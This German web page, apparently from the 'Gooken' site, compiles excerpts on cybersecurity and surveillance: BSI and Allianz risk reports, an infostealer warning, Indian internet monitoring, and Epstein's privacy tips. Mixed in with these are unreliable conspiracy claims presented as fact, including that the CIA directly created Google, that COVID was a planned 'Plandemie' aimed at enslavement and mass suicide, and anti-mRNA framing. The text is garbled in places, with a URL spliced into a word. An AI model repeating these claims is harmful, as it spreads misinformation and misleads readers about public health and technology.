https://1.ard.de/Money_Maker https://www.ardaudiothek.de/episode/11km-der-tagesschau-podcast/von-beruf-hacker-programmierte-un-sicherheit/tagesschau/12419277/ Kim Dotcom: Staatsgeheimnisse sind nur für die gewöhnlichen Menschen geheim, nicht aber für Nationen, die in den globalen Cyberkrieg verwickelt sind, uncut-news.ch, 04.11.2022 "Streng geheim" bedeutet für die weltweit besten Spionageagenturen nichts. Geheimhaltung ist dazu da, die Bürger im Dunkeln zu lassen. [...] Lassen Sie mich das erklären: Alle großen technischen Datenbanken werden von allen großen Spionageagenturen mit Backdoor versehen. Jedes Smartphone ist ein offenes Mikrofon für sie. Jeder Computer, der mit dem Netz verbunden ist, ist offen. Alle wichtigen Chips und die meiste Hardware sind trojanisiert. Alle Daten, die eine Spionageagentur sammelt, werden von den anderen gestohlen. Die Täter von Großereignissen wissen, dass ihre Gegner genau wissen, wer es war, und es ist ein Spiel, das sie gegeneinander spielen, auf Kosten der normalen Menschen, die zu Opfern von dummen Schwanzwedelwettbewerben werden. Es ist ein geheimer Krieg, der schon seit Jahrzehnten geführt wird. Ich war früher ein Hacker, wurde Datensicherheitsberater, heuerte die weltweit besten Hacker an und wurde von Fortune-500-Unternehmen dafür bezahlt, sie zu hacken. Wir hatten nie einen Kunden, den wir nicht erfolgreich gehackt haben. Das ist die Wahrheit. Es gibt überhaupt keine effektive Datensicherheit. Alles ist weit offen. Spionageagenturen mit Milliardenbudgets haben Programmierer in allen führenden Technologieunternehmen, die Hintertüren einbauen. Es ist unmöglich, sie geheim zu halten. Konkurrierende Agenturen, Cyber-Kriminelle und Sicherheitsanalysten finden sie. Aus diesem Grund muss man ständig neue Sicherheits-Patches installieren. Ich weiß genau, wie das alles funktioniert, und als die NSA mit ihrer neuseeländischen Partnerbehörde GCSB zusammenarbeitete, um meine Geräte auszuspionieren (in einer Urheberrechtssache), habe ich sie erwischt, entlarvt, vor Gericht gebracht, eine Gesetzesänderung erzwungen und der Premierminister musste sich bei mir entschuldigen. Alle Staatsoberhäupter sind im Visier der Spionagetechnik, und kein einziger von ihnen, nicht einmal der US-Präsident, wird nicht rund um die Uhr von mehreren ausländischen und inländischen Stellen erfolgreich ausspioniert. Sogar die verschlüsselten Geräte, die die Spionageagenturen den Staatsoberhäuptern zur Verfügung stellen, sind mit einer Backdoor versehen. Das ist die Realität. Gelegentliche Privatgespräche in Null-Technologie-Umgebungen sind möglich, aber die seltene Ausnahme. https://uncutnews.ch/kim-dotcom-staatsgeheimnisse-sind-nur-fuer-die-gewoehnlichen-menschen-geheim-nicht-aber-fuer-nationen-die-in-den-globalen-cyberkrieg-verwickelt-sind/ Warnung vor neuem Infostealer, der sich über Google-Ads verbreitet, trojaner-info.de, 01.03.2023 Der Sicherheitsdienstanbieter Zscaler warnt vor einem erstmals im Dezember 2022 entdeckten Infostealer, der in der Lage ist, Anmeldeinformationen von Webbrowsern, VPN-Clients, E-Mail-Clients und Chat-Clients sowie von Kryptowährungswallets zu stehlen. Die in C++ geschriebene Malware bestehe aus einem Loader und dem Hauptmodul, erläutern die Sicherheitsexperten des Zscaler ThreatLabZ-Teams. Letzteres sei für das Exfiltrieren der gesammelten Anmeldedaten verantwortlich. Es handele sich um ein bösartiges Schadprogramm, dass sich vornehmlich über Google-Ads verbreitet. https://www.trojaner-info.de/sicher-anonym-im-internet/aktuelles/warnung-vor-neuem-infostealer-der-sich-ueber-google-ads-verbreitet.html Britischer Journalist zeigt, wie die CIA eine "direkte" Rolle bei der Gründung von Google spielte, uncut-news.ch, 03.03.2023 Google "begann im Grunde als ein CIA-Projekt", so der Journalist und Autor von "Propaganda im Informationszeitalter", Alan MacLeod, der davor gewarnt hat, dass die Verbindungen der Tech-Giganten zu den Geheimdiensten große Probleme für die Informations- und Meinungsfreiheit mit sich bringen. MacLeod, der die Verbindungen zwischen dem nationalen Sicherheitsstaat und Big Tech eingehend untersucht hat, erklärte dem Journalisten Whitney Webb im Podcast Unlimited Hangout, wie eine frühere Untersuchung von Dr. Nafeez Ahmed ergab, dass die CIA und die National Security Agency (NSA) die Forschung von Sergey Brin an der Stanford University "finanzierten", die "Google hervorbrachte". "Nicht nur das … aber sein Vorgesetzter dort war ein CIA-Mitarbeiter. Die CIA hat Google also tatsächlich direkt ins Leben gerufen. Tatsächlich hielt die CIA bis 2005 Anteile an Google und verkaufte sie schließlich", so MacLeod gegenüber Webb. Hören Sie sich den vollständigen, erstaunlichen Podcast hier an: https://rokfin.com/post/121828 Ahmed erklärte, dass Brin und sein Google-Mitbegründer Larry Page "die Kernkomponente dessen, was schließlich zu Googles Suchdienst wurde", "mit Mitteln der Digital Library Initiative (DLI)" entwickelten, einem Programm der National Science Foundation (NSF), der NASA und der DARPA. Ferner stellte die Massive Digital Data Systems (MDDS)-Initiative der Geheimdienste, ein von der NSA, der CIA und dem Director of Central Intelligence gefördertes Projekt, "im Wesentlichen die Startfinanzierung für Brin dar, die durch viele andere Quellen ergänzt wurde". Brin und Page berichteten "regelmäßig" an Dr. Bhavani Thuraisingham und Dr. Rick Steinheiser, die "Vertreter eines sensiblen Forschungsprogramms der US-Geheimdienste für Informationssicherheit und Data-Mining" waren, so Ahmed weiter. Ahmed hat argumentiert, dass die Beteiligung von Geheimdiensten an der Entstehung von Google, zum Beispiel, zutiefst zielgerichtet ist: dass sie "die Web-Plattformen, die wir heute kennen, genau zu dem Zweck aufgebaut haben, die Technologie zu nutzen … um [einen] globalen ´Informationskrieg´ zu führen - einen Krieg, der die Macht der Wenigen über den Rest von uns legitimiert." Bei Google arbeiten Dutzende Ex-CIA-Agent In seinen eigenen Nachforschungen hat MacLeod herausgefunden, dass die Verbindungen der CIA zu Google bis heute andauern, da es "Dutzende Beispiele" von ehemaligen CIA-Agenten gibt, die jetzt bei Google arbeiten, "die gerade mit dem Fallschirm in diese notwendigen Positionen gebracht wurden." Hier der Artikel auf Deutsch. Das heißt, diese ehemaligen CIA-Mitarbeiter sind häufig in "Vertrauens- und Sicherheits"-Positionen tätig, die einen großen Einfluss auf die Verwaltung von sogenannten "Fehlinformationen" und "Hassreden" haben. Beispiele hierfür sind Jacqueline Lopour, Ryan Fugit und Nick Rossman. Solche Einstellungspräferenzen deuten darauf hin, so MacLeod, dass Big Tech entweder "aktiv aus den Geheimdiensten rekrutiert oder dass es eine Art Hinterzimmer-Deal zwischen dem Silicon Valley und dem nationalen Sicherheitsstaat gibt." MacLeod ist überzeugt, dass die Verbindungen der US-Geheimdienste zu Google sowie zu Social-Media-Plattformen wie Twitter und Facebook keine große Überraschung sein sollten. "Soziale Medien sind von enormer Bedeutung. Sie entscheiden wirklich darüber, was wir über das denken, was wir sehen und was wir nicht sehen. Sie prägen alles, was wir tun. Und wenn ein Unternehmen so mächtig wird, ist es nur natürlich, dass mächtige Organisationen, egal ob Unternehmen oder Regierungen, sich das ansehen und versuchen zu verstehen, wie sie es hacken können, wie sie es zu ihrem eigenen Vorteil nutzen oder wie sie es sogar infiltrieren können." "Google ist wirklich zu groß, um es zu ignorieren … was in der Google-Suche auftaucht, hat enorme Auswirkungen auf die Denkweise der Menschen, auf politische Bewegungen, auf die öffentliche Meinung", merkte MacLeod an und ging sogar so weit zu spekulieren, dass das Unternehmen "vielleicht das wichtigste und einflussreichste Unternehmen der Welt ist." Quelle: https://www.lifesitenews.com/news/british-journalist-shows-how-the-cia-played-a-direct-role-in-the-creation-of-google/ https://uncutnews.ch/britischer-journalist-zeigt-wie-die-cia-eine-direkte-rolle-bei-der-gruendung-von-google-spielte/ BSI-Lagebericht Cybersicherheit gefährdet wie nie, tagesschau.de, 25.10.2022 Die Gefahr zum Opfer von Cyberkriminellen zu werden, ist in Deutschland so hoch wie noch nie. Laut zuständigem Bundesamt geht es meist darum, Geld zu erpressen. Es gebe aber auch mehr Attacken infolge des Ukraine-Krieges. Cyberkriminielle und staatliche Akteure gefährden die Sicherheit der Deutschen im Cyberraum so stark wie nie zuvor. Das geht aus dem Lagebericht des Bundesamts für Sicherheit in der Informationstechnik hervor, der in Berlin veröffentlicht wurde. Neben den kriminellen Aktionen macht die Behörde Cyberangriffe im Kontext des russischen Angriffs auf die Ukraine als Ursache für die hohe Bedrohung aus. Beklagt wurde auch in vielen Fällen eine unzureichende Produktqualität von IT- und Software-Produkten. Im Jahr 2021 seien mehr als 20.000 Schwachstellen in Software-Produkten entdeckt und erfasst worden, sagte Bundesinnenministerin Nancy Faeser bei der Vorstellung des Berichts. Das entspreche einem Zuwachs von zehn Prozent gegenüber dem Vorjahr, so die SPD-Politikerin. Im Berichtszeitraum von Juni 2021 bis Mai 2022 wurde wie bereits im Vorjahr eine hohe Bedrohung durch Cyberkriminalität beobachtet, hinter der vor allem finanzielle Motive stecken. "Hinzu kamen verschiedene Bedrohungen im Zusammenhang mit dem russischen Angriffskrieg auf die Ukraine." Bislang gab es in Deutschland in diesem Kontext eine Ansammlung kleinerer Vorfälle und Hacker-Kampagnen, wie das Bundesamt mitteilte. Eine übergreifende Angriffskampagne gegen deutsche Ziele sei im Berichtszeitraum nicht ersichtlich gewesen. Die Lage im Cyberraum von NATO-Partnern sei dagegen teilweise angespannt und in der Ukraine teilweise existenzbedrohend kritisch gewesen. "Angespannt, dynamisch, vielfältig" Dem Vizepräsidenten des BSI, Gerhard Schabhüser, zufolge sind sogenannte Ransomware-Angriffe aktuell die größte Bedrohung im Cyberbereich. Darunter versteht man Cyberangriffe auf Unternehmen, Universitäten und Behörden, mit dem Ziel, Lösegeld zu erpressen. So ist es im Berichtszeitraum zu mehreren Ransomware-Vorfällen gekommen, bei denen Kommunen in Deutschland angegriffen wurden. "Die Bedrohungslage im Cyberraum ist angespannt, dynamisch und vielfältig und damit so hoch wie nie", sagte der BSI-Vizepräsident. In einer digitalisierten Welt hänge das Wohlergehen der Bevölkerung stärker denn je davon ab, "wie gut wir uns gegen IT-Sicherheitsvorfälle gerüstet haben", betonte Schabhüser. "Jedes Computersystem, das nicht gehackt werden kann, jede digitale Dienstleistung, die nicht gestört werden kann, ist ein elementarer Beitrag zu einer funktionierenden digital vernetzten Gesellschaft." Deutschland dürfe beim Thema Cybersicherheit nicht nachlassen. Faeser kündigt Verbesserungen an Das Bundesinnenministerium will laut Faeser bei seiner Cyber-Sicherheitsagenda "noch in dieser Legislaturperiode wesentliche Fortschritte erreichen und die Cybericherheit auf ein neues Level heben". Jede Schwachstelle in Soft- oder Hardwareprodukten sei ein potenzielles Einfallstor für Angreifer, sagte die SPD-Politikerin. Das gefährde die Informationssicherheit in Verwaltung, Wirtschaft und Gesellschaft. Faeser sagte zu dem Bericht weiter, die seit dem russischen Angriffskrieg auf die Ukraine anhaltend erhöhte Bedrohungslage erfordere eine strategische Neuaufstellung und deutliche Investitionen in Deutschlands Cybersicherheit. https://www.tagesschau.de/inland/bsi-bericht-cybersicherheit-101.html Hacker organisieren sich immer professioneller, trojaner-info.de, 22.12.2021 Im Laufe des Jahres 2021 haben Cyberkriminelle ihre Untergrund-Ökosysteme immer besser organisiert, sodass im neuen Jahr mit noch professionelleren Angriffsmustern gerechnet werden muss. Insbesondere Ransomware-Gruppen suchen laut den Sicherheitsexperten von Radware zunehmend Verbündete unter erfahrenen Auftragshackern, die sich über die Gewinne aus großen Erpressungskampagnen freuen. https://www.trojaner-info.de/daten-sichern-verschluesseln/aktuelles/hacker-organisieren-sich-immer-professioneller.html Risikobarometer der Allianz Cyberangriffe größte Gefahr für Firmen, tagesschau.de, 18.01.2022 Gefährlicher als die Pandemie oder Naturkatastrophen: Fach- und Führungskräfte, die vom Versicherungskonzern Allianz befragt wurden, sehen Hackerangriffe und deren Folgen als Risiko Nummer eins für ihr Unternehmen. Die größte Gefahr für die Unternehmen weltweit sehen Experten in der IT ihrer Firmen. Erpressung oder Schäden wie ein Produktionsstopp durch Cyberangriffe rangieren noch vor den befürchteten Schäden durch die Pandemie, Naturkatastrophen oder den Klimawandel. Der zur Allianz gehörende Industrieversicherer AGCS hat für sein aktuelles "Risikobarometer" im vergangenen Herbst insgesamt 2650 Fachleute aus 89 Ländern befragt. Dazu zählten mehr als 1200 Führungskräfte großer Unternehmen mit mehr als 500 Millionen Dollar Jahresumsatz. Betriebsunterbrechungen für deutsche Unternehmen noch gefährlicher Nach der Risikoeinschätzung der Manager und Sicherheitsfachleute sind Cyberangriffe 2022 die größte Gefahr für Unternehmen. Betriebsunterbrechungen, Naturkatastrophen und Pandemien folgen auf den Plätzen zwei bis vier. Bei deutschen Unternehmen werden laut Umfrage allerdings Betriebsunterbrechungen noch vor den Hackerangriffen auf Platz eins der Gefahren gesehen. Die Risiken einer Pandemie wie der derzeitigen Corona-Pandemie sind in der Wahrnehmen der Unternehmen geringer geworden. Noch im vergangenen Jahr wurden die Auswirkungen der Pandemie als zweitgrößtes Risiko von den Firmen eingeschätzt. Noch im Jahr davor lag dieses Risiko aber noch auf Platz 17 bei den Befragten. Erpressung mit "Ransomware" Dass Hackerangriffe inzwischen als massive Gefahr für den Betrieb angesehen werden, dürfte auch mit den Attacken der vergangenen Monate und Jahre zusammenhängen. Sehr stark zugenommen hat die Zahl der "Ransomware"-Attacken. Mit Hilfe von Verschlüsselungssoftware legen Hacker Computernetze lahm, um anschließend für die Entsperrung hohe Summen zu erpressen. Auch sehr gute IT-Sicherheitsvorkehrungen schützen nicht hundertprozentig gegen Hacker-Angriffe: "Die Unternehmen stecken sehr viel Geld in die Weiterentwicklung der IT-Sicherheit, aber dennoch stellen wir fest, dass Angreifer durchkommen und Unternehmen zum Teil auch enorm schädigen können", sagte AGCS-Experte Jens Krickhahn. Betroffen von Attacken waren in den vergangenen Monaten etwa Einzelhandelsketten wie Coop in Schweden, aber auch kritische Infrastruktur wie beim US-Konzern Colonial Pipeline, der nach einem Hacker-Angriff seine Versorgungsleitungen für Öl und Benzin an der Ostküste der USA vorübergehend stilllegen musste. Größere Schäden als durch den Drogenhandel Das IT-Unternehmen Cybersecurity Ventures schätzt, dass die durch Cyberkriminalität verursachten weltweiten Schäden 2021 sechs Billionen Dollar erreicht haben. Laut den Experten könnte diese Summe bis 2025 auf 10,5 Billionen Dollar steigen. Die immense Summe beinhaltet Datendiebstahl und -zerstörung, Finanzkriminalität, Produktivitätsverluste, Diebstahl geistigen Eigentums und andere Delikte ebenso wie die Kosten der Schadenbeseitigung. Die Schäden durch Cyberangriffe wären somit größer als die durch den weltweiten Drogenhandel. Laut dem deutschen IT-Branchenverband BITKOM 2021 ist gerade der Mittelstand in den Augen von Cyberkriminellen ein lukratives Ziel, da man sich neben guten Erfolgsaussichten tendenziell auch unter dem Radar der Strafverfolgungsbehörden bewege. Neben dem fehlenden Verständnis für die eigene Attraktivität als Unternehmen für Cyberkriminelle mangele es vor allem im Mittelstand an Personal und Ressourcen. Eine Versicherung gegen Hackerangriffe kann in der Regel nur ein Unternehmen abschließen, das bereits umfangreiche IT-Sicherheitsvorkehrungen getroffen hat, denn ansonsten ist das Risiko für den Versicherer zu groß. BITKOM-Präsident Achim Berg fordert aber auch von der neuen Bundesregierung bessere Vorbeugung gegen Cyberangriffe, inklusive "ausreichender finanzieller, materieller und personeller Ressourcen für die Bundeswehr". https://www.tagesschau.de/wirtschaft/unternehmen/cyberattacken-unternehmen-risiken-101.html "Im Grunde genommen wird jede Form der elektronischen Kommunikation von der Regierung unter die Lupe genommen. Selbst teilweise geschriebene E-Mails, die in Entwurfsordnern gespeichert sind, können von der Regierung abgefangen werden" Indiens Regierung kann jetzt das Internet in Echtzeit überwachen und versucht gleichzeitig die Nutzung von VPN zu verbieten, uncut-news.ch, 16.11.2022 Geheimdienste/NSA/Überwachung/BigData Die indische Regierung kann die Online-Aktivitäten aller Personen überwachen, die einen in Indien ansässigen Internetdienstanbieter (ISP) nutzen. Seit den Terroranschlägen von Mumbai 2008 hat Neu-Delhi seine Online-Überwachung verstärkt. Laut dem Tech-Outlet Entrackr hat das Ministerium für Telekommunikation uneingeschränkten und direkten Zugang zum Online-Verkehr über indische ISPs. Laut Entrackr hat die Regierung aufgrund von Anfragen nach öffentlichen Unterlagen Zugriff auf den Echtzeit-Webverkehr, ohne dass der Nutzer und der Internetanbieter davon wissen. Indische Internetnutzer können also nie sicher sein, dass ihr Internetverkehr nicht von Strafverfolgungsbehörden überwacht wird. Das Kernstück des indischen Überwachungssystems ist das Central Monitoring System. Es wurde vor den Anschlägen von Mumbai eingeführt, um Internetdaten und Telefongespräche abzufangen. Allerdings ist nicht viel über das Programm bekannt. "Im Grunde genommen wird jede Form der elektronischen Kommunikation von der Regierung unter die Lupe genommen. Selbst teilweise geschriebene E-Mails, die in Entwurfsordnern gespeichert sind, können von der Regierung abgefangen werden", schrieb ein Professor der Universität Washington in einem 2015 veröffentlichten Papier. Die Verbindung zum Internet über ein VPN könnte die Nutzer vor einer möglichen Überwachung schützen. In den letzten Monaten ist die Regierung jedoch hart gegen VPNs vorgegangen. Sie erließ ein Gesetz, das VPN-Anbieter mit Servern in Indien dazu verpflichtet, detaillierte Protokolle über ihre Kunden, einschließlich Namen und IP-Adressen, zu speichern. Viele Anbieter reagierten daraufhin und zogen ihre Dienste aus Indien zurück. Die Regierung darf die Überwachung nur durchführen, um die "Souveränität oder Integrität Indiens, die Verteidigung Indiens, die Sicherheit des Staates, freundschaftliche Beziehungen zu ausländischen Staaten oder die öffentliche Ordnung" zu schützen. Diese Bedingungen sind jedoch vage und schlecht definiert und werden ohne Aufsicht angewandt, was es der Regierung leicht macht, zu weit zu gehen. Quelle: India´s government can now surveil the internet in real-time, https://reclaimthenet.org/indias-government-can-now-surveil-the-internet-in-real-time/ https://uncutnews.ch/indiens-regierung-kann-jetzt-das-internet-in-echtzeit-ueberwachen-und- versucht-gleichzeitig-die-nutzung-von-vpn-zu-verbieten/ Apps zur Kontaktverfolgung verletzen die Privatsphäre, T.H.G., uncut-news.ch, 28.02.2023 Der berühmte Roman beschreibt, wie die Regierung jeden Aspekt des Lebens der Menschen kontrolliert, auch ihre Gedanken. Link zum Video GESCHICHTE AUF EINEN BLICK Das Weißbuch der Rockefeller-Stiftung "National COVID-19 Testing Action Plan" legt einen strategischen Rahmen fest, der eindeutig dazu bestimmt ist, Teil einer permanenten Überwachungs- und sozialen Kontrollstruktur zu werden, die die persönliche Freiheit und Entscheidungsfreiheit stark einschränkt. Kontaktverfolgungs-Apps sind ein wesentlicher Bestandteil dieses Plans, und der Rockefeller-Plan besagt eindeutig, dass "Daten wann immer und wo immer möglich offen sein sollten" und dass "Datenschutzbedenken beiseite geschoben werden müssen". Die USA sind dabei, ein von künstlicher Intelligenz angetriebenes Massenüberwachungssystem einzuführen, das mit dem von China konkurriert, und rechtliche und strukturelle Hindernisse werden unter dem Deckmantel der Bekämpfung von COVID-19 ausgeräumt. Kontaktverfolgungs-Apps erfordern, dass man sein Handy den ganzen Tag bei sich trägt, wodurch Tausende von Dritten Zugang zu persönlichen Daten erhalten. Die Privatsphäre schützt die Menschen vor Einmischung, Intervention und Manipulation und muss um jeden Preis geschützt werden. Quelle: https://takecontrol.substack.com/p/contact-tracing-app https://uncutnews.ch/apps-zur-kontaktverfolgung-verletzen-die-privatsphaere/ Google - ein Diktator, wie ihn die Welt noch nie gesehen hat, Mercola, uncut-news.ch, 13.09.2022 Direkt zum Video: Robert Epstein ist ein in Harvard ausgebildeter Psychologe, der aufgedeckt hat, wie Google über seine Suchmaschine die öffentliche Meinung manipuliert, um die Ergebnisse von Wahlen und vielen anderen wichtigen Bereichen zu verändern. Seine Untersuchungen zeigen, dass Google neue Manipulationstechniken einsetzt, die es in der Geschichte der Menschheit noch nie gegeben hat. Als ob das nicht schon schlimm genug wäre, sind diese Werkzeuge auch noch flüchtig und hinterlassen keine Spuren auf Papier. Nach Epsteins Berechnungen hätte Google im Jahr 2020 die Möglichkeit, 15 Millionen Stimmen im Vorfeld der US-Präsidentschaftswahlen 2020 zu verschieben. Da Google zu einem alltäglichen Werkzeug geworden ist, das für mehr als 90 % aller Suchanfragen weltweit verwendet wird, hat das Unternehmen im Jahr 2020 wahrscheinlich die Ergebnisse von 25 % der nationalen Wahlen in der Welt bestimmt. Suchvorschläge - die in einem Dropdown-Menü angezeigt werden, wenn man einen Suchbegriff eingibt - sind ein weiteres mächtiges Manipulationsinstrument, das eine 50:50-Aufteilung unter unentschlossenen Wählern in eine 90:10-Aufteilung verwandeln kann, ohne dass jemand auch nur die geringste Ahnung hat, dass er manipuliert wurde. Robert Epstein, der 1981 in Harvard in Psychologie promovierte und früher Chefredakteur von Psychology Today war, ist heute leitender Forschungspsychologe des American Institute of Behavioral Research and Technology, wo er in den letzten zehn Jahren dazu beigetragen hat, die manipulativen und betrügerischen Praktiken von Google aufzudecken. In diesem Interview erklärt er, wie es dazu kam, dass er sich überhaupt für die Untersuchung des Internet-Suchmonopols interessierte: ... Die Befugnisse von Google stellen drei spezifische Bedrohungen für die Gesellschaft dar: Sie sind eine Überwachungsbehörde mit erheblichen, aber verborgenen Überwachungsbefugnissen. Wie Epstein bemerkt: Die Suchmaschine … Google Wallet, Google Docs, Google Drive, YouTube, das sind Überwachungsplattformen. Mit anderen Worten: Aus ihrer Sicht besteht der Wert dieser Tools darin, dass sie ihnen mehr Informationen über Sie liefern. Überwachung ist das, was sie tun. Sie sind eine Zensurbehörde, die in der Lage ist, den Zugang zu Websites im gesamten Internet einzuschränken oder zu sperren und so zu entscheiden, was die Menschen sehen können und was nicht. Sie sind sogar in der Lage, den Zugang zu ganzen Ländern und zum Internet als Ganzes zu sperren. Das größte Problem bei dieser Art von Internetzensur ist, dass man nicht weiß, was man nicht weiß. Wenn eine bestimmte Art von Information aus der Suche entfernt wird und man nicht weiß, dass sie existieren sollte, wird man nie danach suchen. Und wenn Sie online nach Informationen suchen, woher wissen Sie dann, dass bestimmte Websites oder Seiten überhaupt aus den Suchergebnissen entfernt wurden? Die Antwort lautet: Man weiß es nicht. So investiert Google beispielsweise schon seit geraumer Zeit in DNA-Repositorien und fügt unseren Profilen DNA-Informationen hinzu. Laut Epstein hat Google das nationale DNA-Repositorium übernommen, aber die Artikel darüber - die er in seinen eigenen Schriften zitiert hat - waren im Jahr 2020 verschwunden. Einige der Artikel sind inzwischen wieder aufgetaucht, aber um einen besseren Überblick darüber zu bekommen, was Google seit mindestens 2011 getan hat, ist eine neue Suchmaschine, Freespoke.com, eine großartige Quelle für diese Recherchen. Sie haben die Macht, die öffentliche Meinung durch Suchrankings und andere Mittel zu manipulieren. [...] Google betreibt einen totalen Überwachungsstaat In seinem Artikel "Seven Simple Steps Toward Online Privacy" (Sieben einfache Schritte zum Schutz der Online-Privatsphäre) gibt Epstein Empfehlungen für den Schutz Ihrer Privatsphäre beim Surfen im Internet, von denen die meisten nichts kosten. ... Schritte zum Schutz Ihrer Online-Privatsphäre Zum Schutz Ihrer Privatsphäre empfiehlt Epstein die folgenden Schritte, von denen sieben in "Seven Simple Steps Toward Online Privacy" beschrieben sind. Der letzte Schritt, Fitbit, ist ein neueres Anliegen. Verwenden Sie ein virtuelles privates Netzwerk (VPN) wie Nord, das nur etwa 3 Dollar pro Monat kostet und auf bis zu sechs Geräten genutzt werden kann. Meiner Meinung nach ist dies ein Muss, wenn Sie Ihre Privatsphäre schützen wollen. Epstein erklärt: Wenn Sie Ihr Mobiltelefon, Ihren Laptop oder Ihren Desktop auf die übliche Weise benutzen, ist Ihre Identität für Google und andere Unternehmen einfach zu erkennen. Sie können sie über Ihre IP-Adresse feststellen, aber es gibt immer ausgefeiltere Methoden, mit denen sie wissen, dass Sie es sind. Eine davon ist das sogenannte Browser-Fingerprinting. Das ist etwas, das sehr beunruhigend ist. Im Grunde ist die Art Ihres Browsers und die Art und Weise, wie Sie Ihren Browser verwenden wie ein Fingerabdruck. Sie verwenden Ihren Browser auf einzigartige Weise, und allein durch die Art und Weise, wie Sie tippen, können diese Unternehmen Sie jetzt identifizieren. Brave bietet einen gewissen Schutz gegen Browser-Fingerabdrücke, aber Sie müssen wirklich ein VPN verwenden. Ein VPN leitet alles, was Sie tun, über einen anderen Computer an einem anderen Ort um. Das kann überall auf der Welt sein, und es gibt Hunderte von Unternehmen, die VPN-Dienste anbieten. Das Unternehmen, das mir im Moment am besten gefällt, heißt Nord VPN. Sie laden die Software herunter und installieren sie, wie jede andere Software auch. Es ist unglaublich einfach zu bedienen. Man muss kein Techniker sein, um Nord VPN zu benutzen, und es zeigt Ihnen eine Weltkarte, auf der Sie einfach auf ein Land klicken. Das VPN lässt es im Grunde so aussehen, als wäre Ihr Computer nicht Ihr Computer. Es schafft im Grunde eine Art falsche Identität für Sie, und das ist eine gute Sache. Regelmäßig werde ich über die Computer von Nord in den Vereinigten Staaten gehen. Manchmal muss man das tun, oder man kann bestimmte Dinge nicht erledigen. PayPal mag es zum Beispiel nicht, wenn man im Ausland ist. Wenn Sie Nord auf Ihrem Mobiltelefon verwenden, wird Ihre Identität auch bei der Nutzung von Anwendungen wie Google Maps verschleiert. Verwenden Sie nicht Gmail, da jede von Ihnen geschriebene E-Mail dauerhaft gespeichert wird. Sie wird Teil Ihres Profils und wird verwendet, um digitale Modelle von Ihnen zu erstellen, die es ihnen ermöglichen, Vorhersagen über Ihre Denkweise und jeden Wunsch zu treffen. Auch viele andere ältere E-Mail-Systeme wie AOL und Yahoo werden auf die gleiche Weise wie Gmail als Überwachungsplattform genutzt. ProtonMail.com, das eine Ende-zu-Ende-Verschlüsselung verwendet, ist eine gute Alternative und das Basiskonto ist kostenlos. Verwenden Sie nicht den Chrome-Browser von Google, da alles, was Sie dort tun, überwacht wird, einschließlich Tastenanschläge und jede Webseite, die Sie jemals besucht haben. Brave ist eine großartige Alternative, die den Datenschutz ernst nimmt. Brave ist außerdem schneller als Chrome und unterdrückt Werbung. Es basiert auf Chromium, der gleichen Software-Infrastruktur, auf der auch Chrome basiert, sodass Sie Ihre Erweiterungen, Favoriten und Lesezeichen problemlos übertragen können. Verwenden Sie nicht Google als Suchmaschine oder eine Google-Erweiterung wie Bing oder Yahoo, die beide Suchergebnisse von Google beziehen. Das Gleiche gilt für den persönlichen Assistenten Siri auf dem iPhone, der alle Antworten von Google bezieht. Zu den von Epstein empfohlenen alternativen Suchmaschinen gehören SwissCows und Qwant. Er empfiehlt, StartPage zu meiden, da es kürzlich von einem aggressiven Online-Marketing-Unternehmen aufgekauft wurde, das wie Google auf Überwachung angewiesen ist. Verwenden Sie kein Android-Handy, und zwar aus den bereits erwähnten Gründen. Benutzen Sie keine Google-Home-Geräte in Ihrem Haus oder Ihrer Wohnung - diese Geräte zeichnen alles auf, was in Ihrem Haus passiert, sowohl Sprache als auch Geräusche wie Zähneputzen oder Wasseraufkochen, selbst wenn sie scheinbar inaktiv sind, und senden diese Informationen an Google zurück. Auch Android-Telefone hören immer mit und zeichnen auf, ebenso wie Googles Heimthermostat Nest und Amazons Alexa. Löschen Sie Ihren Cache und Ihre Cookies - Wie Epstein in seinem Artikel erklärt: Unternehmen und Hacker aller Art installieren ständig invasiven Computercode auf Ihren Computern und Mobilgeräten, hauptsächlich um Sie im Auge zu behalten, manchmal aber auch für schändlichere Zwecke. Auf einem mobilen Gerät können Sie den größten Teil dieses Mülls löschen, indem Sie das Einstellungsmenü Ihres Browsers aufrufen, die Option "Datenschutz und Sicherheit" auswählen und dann auf das Symbol klicken, das Ihren Cache und Ihre Cookies löscht. Bei den meisten Laptop- und Desktop-Browsern gelangen Sie durch gleichzeitiges Drücken von drei Tasten - STRG, UMSCHALT und ENTF - direkt in das entsprechende Menü; ich verwende diese Technik mehrmals täglich, ohne überhaupt darüber nachzudenken. Sie können auch die Browser Brave und Firefox so konfigurieren, dass Ihr Cache und Ihre Cookies automatisch gelöscht werden, wenn Sie Ihren Browser schließen. Quelle: Google -- A Dictator Unlike Anything the World Has Ever Known, https://articles.mercola.com/sites/articles/archive/2022/09/11/google-and-your-privacy.aspx https://uncutnews.ch/google-ein-diktator-wie-ihn-die-welt-noch-nie-gesehen-hat/ Tor, The Anonymizing Network - Äh, ... Looking out for GOOD Tor Nodes (entry-, middle- and exit-nodes / relais) now ..., text 2019 by Gooken #ME#TOO Die weltweite Flucht aus den mRNA-Impfungen geht weiter, uncut-news.ch, 10.10.2022 Alex Berenson Australien hat in aller Stille die Empfehlung für weitere Covid-Impfungen für fast alle unter 50 Jahren und für Norwegen unter 65 Jahren aufgegeben. Noch vor wenigen Monaten hatte Austhttps://uncutnews.ch/die-weltweite-flucht-aus-den-mrna-impfungen-geht-weiter/ralien eines der weltweit aggressivsten Zwangsprogramme, um der Bevölkerung Covid-Impfungen aufzuzwingen. Quelle: https://alexberenson.substack.com/p/the-worldwide-flight-from-mrna-shots https://uncutnews.ch/die-weltweite-flucht-aus-den-mrna-impfungen-geht-weiter/ "Das größte Verbrechen, das die Welt je gesehen hat" Mit Corona-Plandemie für Traumblondine und Pia Berling völlig offensichtlich: Geplante totale Kontrolle und totale Überwachung zwecks Versklavung und Treiben in den Massensuizid Bezug auf "The Great Reset" von Klaus Schwaab Auflistung beteiligter Firmennamen von A bis Z bei Klaus Schwaab in worldeconomy-forum unter Partner (Facebook, Google, Amazon, Morgan, ..., einige Schweizer Banken, SAP, Bosch, Siemens, ..., Personennamen: Jens Spahn, ... ) , Pia Berling @ Facebook @ Miriam Hope @ weforum.org, 14.01.2021 Video https://www.weforum.org/paartners/#search https://t.me/MiriamHope Gooken-Exkurs bietet Sicherheit für den Computer. Die Beschreibung eignet sich fuuml;r alle UNIX-/Linux-Systeme. Gooken Internet-Suchmaschine zeigt Ihnen auf dieser Webseite Schritt für Schritt (grünes Häkchen für Häkchen), was hierfür zu tun ist ! ... Geschwindigkeits- und Sicherheit-Rekord bereits auf Intel® Celeron! Willkommen zum Online Excurs von Gooken! Mausklick-schnelles, stabiles Lifetime-Computersystem (Kernel wie der 